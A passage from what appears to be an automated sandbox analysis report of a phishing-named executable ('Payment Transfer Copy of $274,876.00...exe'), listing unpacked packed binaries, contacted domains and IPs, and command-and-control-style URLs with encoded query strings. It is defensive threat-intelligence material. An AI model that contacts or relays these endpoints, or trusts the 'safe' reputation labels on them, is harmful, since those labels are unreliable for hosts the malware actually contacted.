          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2b80000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          9.2.explorer.exe.330000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
          www.zomapa.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.zomapa.com/blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          http://www.jasa-software.com/blr/0%Avira URL Cloudsafe
          http://www.olgadalila.com0%Avira URL Cloudsafe
          http://www.prodhealth.site0%Avira URL Cloudsafe
          http://www.sweetpopntreatz.comReferer:0%Avira URL Cloudsafe
          http://www.jaemagreci.com0%Avira URL Cloudsafe
          http://www.zomapa.com0%Avira URL Cloudsafe
          http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.gannahealing.com0%Avira URL Cloudsafe
          http://www.prodhealth.siteReferer:0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.gannahealing.com/blr/0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.stanchilo.com/blr/0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.cvmjqcid.com/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          http://www.sweetpopntreatz.com/blr/www.long9000.com0%Avira URL Cloudsafe
          http://www.kanaai.com/blr/0%Avira URL Cloudsafe
          http://www.na230.com/blr/www.jasa-software.com0%Avira URL Cloudsafe
          http://www.prodhealth.site/blr/0%Avira URL Cloudsafe
          http://www.carbeloy.com/blr/0%Avira URL Cloudsafe
          http://www.gannahealing.comReferer:0%Avira URL Cloudsafe
          http://www.zomapa.comReferer:0%Avira URL Cloudsafe
          http://www.gannahealing.com/blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          http://www.kathrynbaierling.com/blr/0%Avira URL Cloudsafe
          http://www.soheilvaseghi.comReferer:0%Avira URL Cloudsafe
          http://www.jasa-software.com/blr/j0%Avira URL Cloudsafe
          http://www.kanaai.com/blr/www.cvmjqcid.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sweetpopntreatz.com/blr/0%Avira URL Cloudsafe
          http://www.olgadalila.comReferer:0%Avira URL Cloudsafe
          http://www.yoshiyama-potager.com0%Avira URL Cloudsafe
          http://www.long9000.com/blr/0%Avira URL Cloudsafe
          http://www.cvmjqcid.com/blr/www.jaemagreci.com0%Avira URL Cloudsafe
          http://www.na230.comReferer:0%Avira URL Cloudsafe
          http://www.prodhealth.site/blr/www.stanchilo.com0%Avira URL Cloudsafe
          http://www.kanaai.com0%Avira URL Cloudsafe
          http://www.na230.com/blr/0%Avira URL Cloudsafe
          http://www.yoshiyama-potager.com/blr/0%Avira URL Cloudsafe
          http://www.na230.com0%Avira URL Cloudsafe
          http://www.long9000.com/blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          www.jaemagreci.com/blr/0%Avira URL Cloudsafe
          http://www.kathrynbaierling.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jaemagreci.comReferer:0%Avira URL Cloudsafe
          http://www.kathrynbaierling.comReferer:0%Avira URL Cloudsafe
          http://www.jasa-software.comReferer:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.soheilvaseghi.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.yoshiyama-potager.comReferer:0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.stanchilo.com0%Avira URL Cloudsafe
          http://www.long9000.comReferer:0%Avira URL Cloudsafe
          http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix0%Avira URL Cloudsafe
          http://www.long9000.com/blr/www.soheilvaseghi.com0%Avira URL Cloudsafe
          http://www.zomapa.com/blr/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.zomapa.com/blr/www.carbeloy.com0%Avira URL Cloudsafe
          http://www.olgadalila.com/blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          http://www.carbeloy.comReferer:0%Avira URL Cloudsafe
          http://www.soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.carbeloy.com0%Avira URL Cloudsafe
          http://www.kathrynbaierling.com/blr/www.na230.com0%Avira URL Cloudsafe
          http://www.jasa-software.com0%Avira URL Cloudsafe
          http://www.olgadalila.com/blr/www.zomapa.com0%Avira URL Cloudsafe
          http://www.cvmjqcid.com/blr/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          sweetpopntreatz.com
          34.102.136.180
          truetrue
            unknown
            td-balancer-euw2-6-109.wixdns.net
            35.246.6.109
            truetrueunknown
            www.zomapa.com
            164.155.144.220
            truetrueunknown
            jaemagreci.com
            50.116.112.43
            truetrue
              unknown
              gannahealing.com
              176.74.27.137
              truetrue
                unknown
                www.long9000.com
                198.52.105.123
                truetrue
                  unknown
                  cvmjqcid.com
                  210.152.86.132
                  truetrue
                    unknown
                    vaseghi.github.io
                    185.199.108.153
                    truetrue
                      unknown
                      olgadalila.com
                      198.27.88.111
                      truetrue
                        unknown
                        www.jaemagreci.com
                        unknown
                        unknowntrue
                          unknown
                          www.soheilvaseghi.com
                          unknown
                          unknowntrue
                            unknown
                            www.kanaai.com
                            unknown
                            unknowntrue
                              unknown
                              www.gannahealing.com
                              unknown
                              unknowntrue
                                unknown
                                www.olgadalila.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.cvmjqcid.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.sweetpopntreatz.com
                                    unknown
                                    unknowntrue
                                      unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.zomapa.com/blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.cvmjqcid.com/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.gannahealing.com/blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.long9000.com/blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      www.jaemagreci.com/blr/true
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.olgadalila.com/blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.sweetpopntreatz.com/blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.kanaai.com/blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jaemagreci.com/blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8Ltrue
                                      • Avira URL Cloud: safe
                                      unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.jasa-software.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.olgadalila.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.prodhealth.siteexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.sweetpopntreatz.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jaemagreci.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zomapa.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/cThePayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.gannahealing.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.prodhealth.siteReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleasePayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.gannahealing.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.urwpp.deDPleasePayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.stanchilo.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zhongyicts.com.cnPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sweetpopntreatz.com/blr/www.long9000.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kanaai.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.na230.com/blr/www.jasa-software.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.prodhealth.site/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carbeloy.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.gannahealing.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zomapa.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kathrynbaierling.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.soheilvaseghi.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jasa-software.com/blr/jexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kanaai.com/blr/www.cvmjqcid.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.comlPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sweetpopntreatz.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.olgadalila.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.yoshiyama-potager.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.long9000.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.cvmjqcid.com/blr/www.jaemagreci.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.prodhealth.site/blr/www.stanchilo.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kanaai.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.yoshiyama-potager.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designersGPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/?Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.kathrynbaierling.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.founder.com.cn/cn/bThePayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jaemagreci.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kathrynbaierling.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers?Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.jasa-software.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.tiro.comexplorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.soheilvaseghi.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.goodfont.co.krPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netDPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.yoshiyama-potager.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://fontfabrik.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.stanchilo.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.long9000.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixexplorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.long9000.com/blr/www.soheilvaseghi.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.zomapa.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fonts.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.krPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.zomapa.com/blr/www.carbeloy.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carbeloy.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sakkal.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carbeloy.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kathrynbaierling.com/blr/www.na230.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.jasa-software.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.olgadalila.com/blr/www.zomapa.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/www.gannahealing.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.stanchilo.com/blr/www.yoshiyama-potager.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.jaemagreci.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.carbeloy.com/blr/www.prodhealth.siteexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
